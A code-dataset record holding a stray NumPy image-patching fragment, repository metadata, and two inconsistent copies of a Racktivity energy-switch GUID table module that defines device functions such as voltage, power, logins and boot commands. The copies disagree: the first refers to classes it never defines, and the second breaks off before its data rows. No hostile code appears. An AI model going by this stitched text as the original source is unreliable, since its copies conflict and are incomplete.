if im.ndim == 3 and p.shape[2] == 1:
p = np.squeeze(p, axis=2)
return p
if im.ndim == 2:
im_post = np.pad(im, ((0, pad[0]), (0, pad[1])), 'constant')
im_pre = np.pad(im, ((pad[0], 0), (pad[1], 0)), 'constant')
im_pre_c = np.pad(im, ((pad[0], 0), (0, pad[1])), 'constant')
im_pre_r = np.pad(im, ((0, pad[0]), (pad[1], 0)), 'constant')
elif im.ndim == 3:
im_post = np.pad(im, ((0, pad[0]), (0, pad[1]), (0,0)), 'constant')
im_pre = np.pad(im, ((pad[0], 0), (pad[1], 0), (0,0)), 'constant')
im_pre_c = np.pad(im, ((pad[0], 0), (0, pad[1]), (0,0)), 'constant')
im_pre_r = np.pad(im, ((0, pad[0]), (pad[1], 0), (0,0)), 'constant')
else:
raise NotImplementedError('2D or 3D input images are accepted.')
p = view_as_windows(im_post, pShape,pStride).copy()
if im.ndim == 3 and p.shape[2] == 1:
p = np.squeeze(p, axis=2)
for i in range(p.shape[0]-1):
p[i, -1] = im[i * pStride[0]:i * pStride[0] + pShape[0],-pShape[1]:, :]
for j in range(p.shape[1]-1):
p[-1, j] = im[-pShape[0]:,j * pStride[1]:j * pStride[1] + pShape[1], :]
p[-1, -1] = im[-pShape[0]:,-pShape[1]:, :]
return p
def np_patch2im(p, imShape,pStride=None,aggregation_mean=True):
pShape = p.shape[2:]
if pStride is None:
pStride = pShape
if np.isscalar(pStride):
pStride = (pStride, pStride,imShape[2])
img = np.zeros(imShape)
#obj = plotimg(img)
for i in range(0,p.shape[0]-1):
for j in range(0,p.shape[1]-1):
#print(i,j,i * pStride, i * pStride + pShape[0],(j * pStride),(j * pStride + pShape[1]))
img[(i * pStride[0]):(i * pStride[0] + pShape[0]), (j * pStride[1]):(j * pStride[1] + pShape[1]), :] += p[i,j]
#plotimg(img,obj)
for i in range(p.shape[0]-1):
img[i * pStride[0]:i * pStride[0] + pShape[0],-pShape[1]:, :] += p[i, -1]
#plotimg(img, obj)
for j in range(p.shape[1]-1):
img[-pShape[0]:,j * pStride[1]:j * pStride[1] + pShape[1], :] += p[-1, j]
#plotimg(img, obj)
img[-pShape[0]:,-pShape[1]:, :] += p[-1, -1]
if pStride != pShape and aggregation_mean:
p_1 = np_im2patch(np.ones(imShape), pShape, pStride)
div,_ = np_patch2im(p_1, imShape, pStride,False)
#plotimg(div / np.max(div))
# div = np_patch2im(np.ones_like(p), imShape,pStride,aggregation_mean=False)
# div = np_patch2im(np.ones_like(p), imShape,pStride,aggregation_mean=False)
#div = np_patch2im(np.ones_like(p), imShape,pStride,aggregation_mean=False)
img /= div
return img,div
return img,None
| 3,550 | 0 | 50 |
685146d94e80465728e0ac16651b1e598592e6af | 46,188 | py | Python | sandbox/lib/jumpscale/JumpscaleLibsExtra/clients/racktivity/energyswitch/common/GUIDTable.py | threefoldtech/threebot_prebuilt | 1f0e1c65c14cef079cd80f73927d7c8318755c48 | [
"Apache-2.0"
] | 1 | 2020-10-05T08:53:57.000Z | 2020-10-05T08:53:57.000Z | sandbox/lib/jumpscale/JumpscaleLibsExtra/clients/racktivity/energyswitch/common/GUIDTable.py | threefoldtech/threebot_prebuilt | 1f0e1c65c14cef079cd80f73927d7c8318755c48 | [
"Apache-2.0"
] | 17 | 2019-11-14T08:41:37.000Z | 2020-05-27T09:23:51.000Z | sandbox/lib/jumpscale/JumpscaleLibsExtra/clients/racktivity/energyswitch/common/GUIDTable.py | threefoldtech/threebot_prebuilt | 1f0e1c65c14cef079cd80f73927d7c8318755c48 | [
"Apache-2.0"
] | null | null | null | # pylint: disable=W0201
from Jumpscale import j
# Alias for the Jumpscale base object class; not referenced in this table
# module itself — presumably consumed by sibling modules, TODO confirm.
JSBASE = j.baseclasses.object
# --- GUID function definition records (populated below) ---
# ---------------------------------------------------------------------------
# GUID function table.
#
# Maps a numeric GUID to a `Functions` record describing one datapoint of the
# Racktivity energy switch: symbolic name, description, read/write capability
# and the value definition (`Value`) used to decode/encode the raw value.
# `Functions` and `Value` are attribute containers declared earlier in this
# module. The original file repeated an 8-12 line assignment pattern per
# record; the table below produces byte-identical records declaratively.
# ---------------------------------------------------------------------------
functions = {}


def _register(guid, name, description, read, write, value_type, **value_attrs):
    """Create one `Functions` record and store it as ``functions[guid]``.

    :param guid: numeric identifier of the datapoint
    :param name: short symbolic name of the function
    :param description: human-readable description (may be empty)
    :param read: 1 if the value can be read, else 0
    :param write: 1 if the value can be written, else 0
    :param value_type: value-definition type string (e.g. "TYPE_ENUM")
    :param value_attrs: extra value-definition attributes, set verbatim on
        ``valDef`` (any of: size, unit, scale, min, max, length)
    :return: the freshly created `Functions` instance
    """
    func = Functions()
    functions[guid] = func
    func.guid = guid
    func.name = name
    func.description = description
    func.read = read
    func.write = write
    func.valDef = Value()
    func.valDef.type = value_type
    for attr, attr_value in value_attrs.items():
        setattr(func.valDef, attr, attr_value)
    return func


def _numdef(size, unit, scale, minimum, maximum):
    """Shorthand for the attribute set shared by all numeric value types."""
    return dict(size=size, unit=unit, scale=scale, min=minimum, max=maximum)


# Frequently used value-definition type strings.
_U = "TYPE_UNSIGNED_NUMBER"
_S = "TYPE_SIGNED_NUMBER"
_UTS = "TYPE_UNSIGNED_NUMBER_WITH_TS"
_STS = "TYPE_SIGNED_NUMBER_WITH_TS"
_E = "TYPE_ENUM"
_STR = "TYPE_STRING"
_CMD = "TYPE_COMMAND"
_IP = "TYPE_IP"
_RAW = "TYPE_RAW"

# One row per GUID: (guid, name, description, read, write, type, valDef attrs).
# Row order matches the original assignment order (dicts preserve insertion
# order), including 40013 appearing between 60001 and 60002.
_TABLE = [
    (1, "GeneralModuleStatus", "General status of a module", 1, 0, _U,
     _numdef(2, "", 0, 0, 65536)),
    (2, "SpecificModuleStatus", "", 1, 0, _U, _numdef(1, "", 0, 0, 256)),
    (3, "CurrentTime", "Unix timestamp of the current time", 1, 1,
     "TYPE_TIMESTAMP", _numdef(4, "UNIX", 0, 0, 4294967296)),
    (4, "Voltage", "True RMS Voltage", 1, 0, _U, _numdef(2, "V", 2, 0, 65536)),
    (5, "Frequency", "Frequency", 1, 0, _U, _numdef(2, "Hz", 3, 0, 65536)),
    (6, "Current", "Current true RMS", 1, 0, _U, _numdef(2, "A", 3, 0, 65536)),
    (7, "Power", "Real Power", 1, 0, _U, _numdef(2, "W", 1, 0, 65536)),
    (8, "StatePortCur", "current port state", 1, 0, _E, dict(size=1)),
    (9, "ActiveEnergy", "Active Energy", 1, 0, _U,
     _numdef(4, "kWh", 3, 0, 4294967296)),
    (10, "ApparentEnergy", "Apparent Energy", 1, 0, _U,
     _numdef(4, "kVAh", 3, 0, 4294967296)),
    (11, "Temperature", "Temperature", 1, 0, _S,
     _numdef(2, "C", 1, -32768, 32768)),
    (12, "Humidity", "Humidity", 1, 0, _U, _numdef(2, "%RH", 1, 0, 65536)),
    (13, "FanSpeed", "Fanspeed in Rounds per minute", 1, 0, _U,
     _numdef(2, "rpm", 0, 0, 65536)),
    (5000, "MaxCurrent", "Maximum port current occurred since last reset",
     1, 1, _UTS, _numdef(6, "A", 3, 0, 65536)),
    (5001, "MaxPower", "Maximum port power occurred since last reset",
     1, 1, _UTS, _numdef(6, "W", 1, 0, 65536)),
    (5002, "MaxTotalCurrent", "Maximum total current occurred since last reset",
     1, 1, _UTS, _numdef(6, "A", 3, 0, 65536)),
    (5003, "MaxTotalPower", "Maximum total power occurred since last reset",
     1, 1, _UTS, _numdef(8, "W", 1, 0, 4294967296)),
    (5004, "MaxVoltage", "Maximum voltage occurred since last reset",
     1, 1, _UTS, _numdef(6, "V", 2, 0, 65536)),
    (5005, "MinVoltage", "Minimum voltage occurred since last reset",
     1, 1, _UTS, _numdef(6, "V", 2, 0, 65536)),
    (5006, "MinTemperature", "Minimum temperature occurred since last reset",
     1, 1, _STS, _numdef(6, "C", 1, -32768, 32768)),
    (5007, "MaxTemperature", "Maximum temperature occurred since last reset",
     1, 1, _STS, _numdef(6, "C", 1, -32768, 32768)),
    (5008, "MinHumidity", "Minimum humidity occurred since last reset",
     1, 1, _UTS, _numdef(6, "%RH", 1, 0, 65536)),
    (5009, "MaxHumidity", "Maximum humidity occurred since last reset",
     1, 1, _UTS, _numdef(6, "%RH", 1, 0, 65536)),
    (10000, "Address", "Identification of the module", 1, 0, _U,
     _numdef(4, "", 0, 0, 4294967296)),
    (10001, "ModuleName", "Module name", 1, 1, _STR, dict(length=16)),
    (10002, "FirmwareVersion", "Firmware version", 1, 0, "TYPE_VERSION",
     dict(size=4)),
    (10003, "HardwareVersion", "Hardware version", 1, 0, "TYPE_VERSION",
     dict(size=4)),
    (10004, "FirmwareID", "Identification of the firmware", 1, 0, _STR,
     dict(length=8)),
    (10005, "HardwareID", "Identification of the hardware", 1, 0, _STR,
     dict(length=8)),
    (10006, "RackName", "Rack Name", 1, 1, _STR, dict(length=16)),
    (10007, "RackPosition", "Position of the Energy Switch in the rack",
     1, 1, _U, _numdef(2, "", 0, 0, 65536)),
    (10008, "AdminLogin", "Admin Login", 1, 1, _STR, dict(length=16)),
    (10009, "AdminPassword", "Admin Password", 0, 1, _STR, dict(length=16)),
    (10010, "TemperatureUnitSelector", "", 1, 1, _E, dict(size=1)),
    (10011, "IPAddress", "IP-address", 1, 1, _IP, dict(size=4)),
    (10012, "SubNetMask", "Subnetmask", 1, 1, "TYPE_SUBNETMASK", dict(size=4)),
    (10013, "StdGateWay", "Standard gateway IP", 1, 1, _IP, dict(size=4)),
    (10014, "DnsServer", "Dns server IP", 1, 1, _IP, dict(size=4)),
    (10015, "MAC", "MAC address", 1, 0, "TYPE_MAC", dict(size=6)),
    (10016, "DHCPEnable", "DHCP enable", 1, 1, _E, dict(size=1)),
    (10017, "NTPServer", "NTP server IP", 1, 1, _IP, dict(size=4)),
    (10018, "UseDefaultNTPServer", "", 1, 1, _E, dict(size=1)),
    (10019, "UseNTP", "", 1, 1, _E, dict(size=1)),
    (10020, "SNMPTrapRecvIP", "SNMP trap server IP-address", 1, 1, _IP,
     dict(size=4)),
    (10021, "SNMPTrapRecvPort", "", 1, 1, _U, _numdef(2, "", 0, 0, 65536)),
    (10022, "SNMPCommunityRead", "", 1, 1, _STR, dict(length=16)),
    (10023, "SNMPCommunityWrite", "", 1, 1, _STR, dict(length=16)),
    (10024, "SNMPControl", "", 1, 1, _E, dict(size=1)),
    (10025, "TelnetCLIPort", "", 1, 1, _U, _numdef(2, "", 0, 0, 65536)),
    (10026, "TelnetUARTMUXPort", "", 1, 1, _U, _numdef(2, "", 0, 0, 65536)),
    (10027, "SelectUARTMUCChannel", "", 1, 1, _U, _numdef(1, "", 0, 0, 256)),
    (10028, "LDAPServer", "", 1, 1, _IP, dict(size=4)),
    (10029, "UseLDAPServer", "", 1, 1, _E, dict(size=1)),
    (10030, "Beeper", "Beeper control enable beeper for n seconds", 1, 1, _U,
     _numdef(1, "s", 0, 0, 256)),
    (10031, "DisplayLock", "", 1, 1, _E, dict(size=1)),
    (10032, "DisplayTimeOn", "", 1, 1, _U, _numdef(1, "min", 0, 0, 256)),
    (10033, "DisplayRotation", "", 1, 1, _E, dict(size=1)),
    (10034, "PortName", "Name of the port", 1, 1, _STR, dict(length=16)),
    (10035, "PortState",
     "The state of the port, only used to set the port state, see current port state to get the port state",
     1, 1, _E, dict(size=1)),
    (10036, "CurrentPriorOff",
     "Priority level switch off when maximum total current exceeds threshold",
     1, 1, _U, _numdef(1, "1H8L", 0, 0, 256)),
    (10037, "DelayOn", "Port activation delay after power recycle", 1, 1, _U,
     _numdef(2, "s", 0, 0, 65536)),
    (10038, "MaxCurrentOff", "Maximum port current switch off level", 1, 1, _U,
     _numdef(2, "A", 3, 0, 65536)),
    (10039, "MaxCurrentWarning", "Maximum port current warning level",
     1, 1, _U, _numdef(2, "A", 3, 0, 65536)),
    (10040, "MaxPowerOff", "Maximum port power switch off level", 1, 1, _U,
     _numdef(2, "W", 1, 0, 65536)),
    (10041, "MaxPowerWarning", "Maximum port power warning level", 1, 1, _U,
     _numdef(2, "W", 1, 0, 65536)),
    (10042, "MaxTotalCurrentOff", "Maximum total current switch off level",
     1, 1, _U, _numdef(2, "A", 3, 0, 65536)),
    (10043, "MaxTotalCurrentWarning", "Maximum total current warning level",
     1, 1, _U, _numdef(2, "A", 3, 0, 65536)),
    (10044, "MaxTotalPowerOff", "Maximum total power switch off level",
     1, 1, _U, _numdef(2, "W", 1, 0, 65536)),
    (10045, "MaxTotalPowerWarning", "Maximum total power warning level",
     1, 1, _U, _numdef(2, "W", 1, 0, 65536)),
    (10046, "MaxVoltageOff", "Maximum voltage switch off level", 1, 1, _U,
     _numdef(2, "V", 2, 0, 65536)),
    (10047, "MaxVoltageWarning", "Maximum voltage warning level", 1, 1, _U,
     _numdef(2, "V", 2, 0, 65536)),
    (10048, "MinVoltageOff", "Minimum voltage switch off level", 1, 1, _U,
     _numdef(2, "V", 2, 0, 65536)),
    (10049, "MinVoltageWarning", "Minimum voltage warning level", 1, 1, _U,
     _numdef(2, "V", 2, 0, 65536)),
    (10050, "ActiveEnergyReset", "Active Energy", 1, 1, _CMD,
     _numdef(8, "kWh", 3, 0, 4294967296)),
    (10051, "ApparentEnergyReset", "Apparent Energy", 1, 1, _CMD,
     _numdef(8, "kVAh", 3, 0, 4294967296)),
    (10052, "MinTemperatureWarning", "", 1, 1, _S,
     _numdef(2, "C", 1, -32768, 32768)),
    (10053, "MaxTemperatureWarning", "", 1, 1, _S,
     _numdef(2, "C", 1, -32768, 32768)),
    (10054, "MinHumidityWarning", "", 1, 1, _U, _numdef(2, "%RH", 1, 0, 65536)),
    (10055, "MaxHumidityWarning", "", 1, 1, _U, _numdef(2, "%RH", 1, 0, 65536)),
    (10056, "LedStatus", "To set Status of a led", 1, 1, _U,
     _numdef(1, "", 0, 0, 256)),
    (10057, "MatrixDisplayStatus", "To set Status of a small matrix display",
     1, 1, _U, _numdef(1, "", 0, 0, 256)),
    (10058, "Baudrate", "To set baudrate for circular buffers", 1, 1, _E,
     dict(size=1)),
    (10059, "P_PID", "Proportional value of PID", 1, 1, _U,
     _numdef(4, "", 0, 0, 4294967296)),
    (10060, "I_PID", "Integral value of PID", 1, 1, _U,
     _numdef(4, "", 0, 0, 4294967296)),
    (10061, "D_PID", "Derivative value of PID", 1, 1, _U,
     _numdef(4, "", 0, 0, 4294967296)),
    (10062, "WeightOfTempsensor",
     "Gives the weight of a tempsensor to the input of a PID controller",
     1, 1, _U, _numdef(1, "", 0, 0, 256)),
    (10063, "TargetTemp", "Temperature to be set for PID controller",
     1, 1, _S, _numdef(2, "", 1, -32768, 32768)),
    (10064, "MaximumPWM", "Maximum value of pwm to control ventilators",
     1, 1, _U, _numdef(1, "%", 0, 0, 256)),
    (10065, "MinimumPWM", "Minimum value of pwm to control ventilators",
     1, 1, _U, _numdef(1, "%", 0, 0, 256)),
    (10066, "Startuptime", "", 1, 0, _U, _numdef(4, "s", 0, 0, 4294967296)),
    (40000, "JumpBoot",
     "Enter bootloader mode. Normally this command is only sent to application program. When the bootloader is already running, this command will only reply a positive acknowledge.",
     1, 1, _CMD, dict(size=0)),
    (40001, "GotoAddressmode", "Addressing mode on/off", 0, 0, _CMD,
     dict(size=1)),
    (40002, "GotoFactoryMode", "", 0, 1, _CMD, dict(size=16)),
    (40003, "DoSnapshot", "", 0, 0, _CMD, dict(size=1)),
    (40004, "SampleChannelTime", "", 1, 1, _CMD, dict(size=1)),
    (40005, "SampleChannelFFT", "", 1, 1, _CMD, dict(size=1)),
    (40006, "FlushCallibData", "", 0, 0, _CMD, dict(size=1)),
    (40007, "ModNum",
     "To retrieve the number of modules connected to the device. The device itself is treated as module 0.",
     1, 0, _U, _numdef(1, "", 0, 0, 256)),
    (40008, "ModInfo", "To retrieve module information", 1, 0, _STR,
     dict(length=26)),
    (40009, "ApplyIPSettings", "", 0, 1, _CMD, dict(size=1)),
    (50000, "Monitor", "Get the monitor values", 1, 0, "TYPE_POINTER", {}),
    (50001, "Parameter", "get all parameters", 1, 0, "TYPE_POINTER", {}),
    (50002, "CircularReadBuffer",
     "Read from slave(application connected to rs232) to master or from master to application",
     1, 0, "TYPE_CIRCULAR_BUFFER", dict(size=1)),
    (50003, "CircularWriteBuffer",
     "Write of data from application to master or from master to slave(application connected to rs232)",
     0, 1, "TYPE_CIRCULAR_BUFFER", dict(size=1)),
    (50004, "VoltageTimeSamples",
     "Get the voltage samples in oscilloscope view mode", 1, 0, _RAW,
     dict(size=1)),
    (50005, "CurrentTimeSamples",
     "Get the current samples in oscilloscope view mode", 1, 0, _RAW,
     dict(size=1)),
    (50006, "VoltageFreqSamples", "Get the frequency analyse of the voltage",
     1, 0, _RAW, dict(size=1)),
    (50007, "CurrentFreqSamples", "Get the frequency analyse of the current",
     1, 0, _RAW, dict(size=1)),
    (50008, "Eeprom", "read or write eeprom data", 0, 0, _RAW, dict(size=1)),
    (50009, "CallibrationValues", "", 1, 0, _RAW, dict(size=2)),
    (60000, "BootReadID",
     "Get the identification of the microcontroller. The response contains the values stored at memory address 0xFF0000 and 0xFF00002. (8 bytes in total)",
     0, 0, _U, _numdef(1, "", 0, 0, 256)),
    (60001, "BootJumpApp", "Jump to the application, which starts at 0x4000. ",
     0, 1, _CMD, dict(size=0)),
    (40013, "UDPUser", "User mode for UDP commands", 0, 1, _CMD, dict(size=1)),
    (60002, "BootXTEA",
     "Process a block of encrypted program memory data. The decrypted data will then be written into the program (flash) memory.",
     0, 0, _U, _numdef(1, "", 0, 0, 256)),
]

# Build the records; `func` intentionally stays bound to the last record,
# matching the module-level state the original assignment sequence left behind.
for _row in _TABLE:
    func = _register(*_row[:6], **_row[6])
func = Functions()
functions[60004] = func
func.guid = 60004
func.name = "BootErase"
func.description = "Erase a page of program memory. The message takes one parameter, i.e. the page number. Valid page number for the dsPICFJ256 are from 16 to 170."
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[60005] = func
func.guid = 60005
func.name = "BootPageRange"
func.description = (
"To get the number of pages of the application firmware memory. Only pages within this range can be erased."
)
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[60010] = func
func.guid = 60010
func.name = "BootParameters"
func.description = "To set or retrieve the parameters of the device stored in flash during production (factory mode) such as: - Application firmware id (RTF-number) - Application firmware version - Hardware ID (RTH-number) - Hardware version - UID "
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[40010] = func
func.guid = 40010
func.name = "DHCPReset"
func.description = "Reset DHCP"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[14] = func
func.guid = 14
func.name = "CurrentIP"
func.description = "Gives the current IP. When DHCP is on, you can see here what ip is given by the DHCP server"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_IP"
func.valDef.size = 4
func = Functions()
functions[10067] = func
func.guid = 10067
func.name = "UserLogin"
func.description = "User Login"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10068] = func
func.guid = 10068
func.name = "UserPassword"
func.description = "User Password"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10069] = func
func.guid = 10069
func.name = "RestrictedUserLogin"
func.description = "Restricted User Login"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10070] = func
func.guid = 10070
func.name = "RestrictedUserPassword"
func.description = "Restricted User Password"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[60020] = func
func.guid = 60020
func.name = "BootAppFwID"
func.description = "Identification of the firmware"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 8
func = Functions()
functions[60021] = func
func.guid = 60021
func.name = "BootAppFwVersion"
func.description = "Identification of the hardware"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_VERSION"
func.valDef.size = 4
func = Functions()
functions[15] = func
func.guid = 15
func.name = "ApparentPower"
func.description = "Apparent power (this is the product of the current and the voltage)"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "VA"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[16] = func
func.guid = 16
func.name = "PowerFactor"
func.description = "Powerfactor "
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[5010] = func
func.guid = 5010
func.name = "MinCurrent"
func.description = "Minimum port current occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5011] = func
func.guid = 5011
func.name = "MinPower"
func.description = "Minimum port power occured since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5012] = func
func.guid = 5012
func.name = "MinPowerFactor"
func.description = "Minimum powerfactor occured per port since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 5
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[5013] = func
func.guid = 5013
func.name = "MaxPowerFactor"
func.description = "Maximum powerfactor occured per port since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 5
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[17] = func
func.guid = 17
func.name = "TotalCurrent"
func.description = "Total current"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[18] = func
func.guid = 18
func.name = "TotalRealPower"
func.description = "Total real power"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[19] = func
func.guid = 19
func.name = "TotalApparentPower"
func.description = "Total apparent power"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "VA"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[20] = func
func.guid = 20
func.name = "TotalActiveEnergy"
func.description = "Total active energy"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "kWh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[21] = func
func.guid = 21
func.name = "TotalApparentEnergy"
func.description = "Total apparent energy"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "kVAh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[22] = func
func.guid = 22
func.name = "TotalPowerFactor"
func.description = "Total power factor"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[5014] = func
func.guid = 5014
func.name = "MinTotalCurrent"
func.description = "Minimum port current occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5015] = func
func.guid = 5015
func.name = "MinTotalPower"
func.description = "Minimum port power occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5016] = func
func.guid = 5016
func.name = "MinTotalPowerFactor"
func.description = "Minimum total power factor occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 5
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[5017] = func
func.guid = 5017
func.name = "MaxTotalPowerFactor"
func.description = "Maximum total power factor occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 5
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10071] = func
func.guid = 10071
func.name = "ActiveTotalEnergyReset"
func.description = "Active Total Energy / time of reset + value at that time"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 8
func.valDef.unit = "kWh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10072] = func
func.guid = 10072
func.name = "ApparentTotalEnergyReset"
func.description = "Apparent Total Energy / time of reset + value at that time"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 8
func.valDef.unit = "kVAh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[50010] = func
func.guid = 50010
func.name = "MonitorAutoRefresh"
func.description = "Get the monitor values from the module that are auto refreshed"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_POINTER"
func = Functions()
functions[40011] = func
func.guid = 40011
func.name = "Role"
func.description = "To see in which role you are logged in"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[40012] = func
func.guid = 40012
func.name = "UserLoginAndPassword"
func.description = "Contains 1 loginname and 1 password"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 32
func = Functions()
functions[40014] = func
func.guid = 40014
func.name = "DoHotReset"
func.description = "Hot reset of the device"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
| 21.442897 | 257 | 0.720165 | # pylint: disable=W0201
from Jumpscale import j
JSBASE = j.baseclasses.object
class Value(j.baseclasses.object):
    """Value definition of a device function: type, size, unit, scaling, range.

    A ``Value`` can be built either from keyword arguments
    (``Value(type="TYPE_IP", size=4)``) or from the ``key=repr(value)``
    line format produced by :meth:`save` (via ``initStr``).
    Fields not supplied remain ``None``.
    """

    def __init__(self, initStr=None, **kwargs):
        JSBASE.__init__(self)
        # Known value-definition fields; initialize everything with None.
        self.fields = ("type", "size", "length", "unit", "version", "scale", "min", "max")
        for field in self.fields:
            setattr(self, field, None)
        if initStr:
            self.load(initStr)
        else:
            for name, value in kwargs.items():
                setattr(self, name, value)

    def save(self):
        """Serialize the set (non-None) fields as ``key=repr(value)`` lines.

        Returns the lines joined by newlines, with no trailing newline.
        """
        r = ""
        for field in self.fields:
            val = getattr(self, field)
            if val is None:
                continue  # unset fields are omitted from the serialized form
            r += field + "=" + repr(val) + "\n"
        return r.strip()

    def load(self, _str):
        """Restore fields from the ``key=repr(value)`` format written by :meth:`save`.

        Uses ``ast.literal_eval`` instead of ``eval`` so only plain Python
        literals are accepted; :meth:`save` only ever emits ``repr`` of
        str/int values, so behavior is unchanged for round-tripped data,
        while arbitrary code in a tampered string can no longer execute.
        """
        import ast  # local import: keeps the module's import header unchanged

        for line in _str.split("\n"):
            (key, val) = line.split("=", 1)
            setattr(self, key, ast.literal_eval(val))
class Functions(j.baseclasses.object):
    """Descriptor for one device function: GUID, name, access flags and value definition."""

    def __init__(self):
        JSBASE.__init__(self)
        # Default state: no identity, empty description, not readable,
        # not writable, no value definition, empty default value.
        for attr, default in (
            ("guid", None),
            ("name", None),
            ("description", ""),
            ("valDef", None),
            ("read", False),
            ("write", False),
            ("default", ""),
        ):
            setattr(self, attr, default)
# Master registry of function descriptors, keyed by GUID.
functions = {}

# --- Core monitoring / configuration function descriptors -------------------
# Data-driven registration replacing the unrolled one-by-one assignments.
# Row layout: (guid, name, description, readable, writable, value-def kwargs).
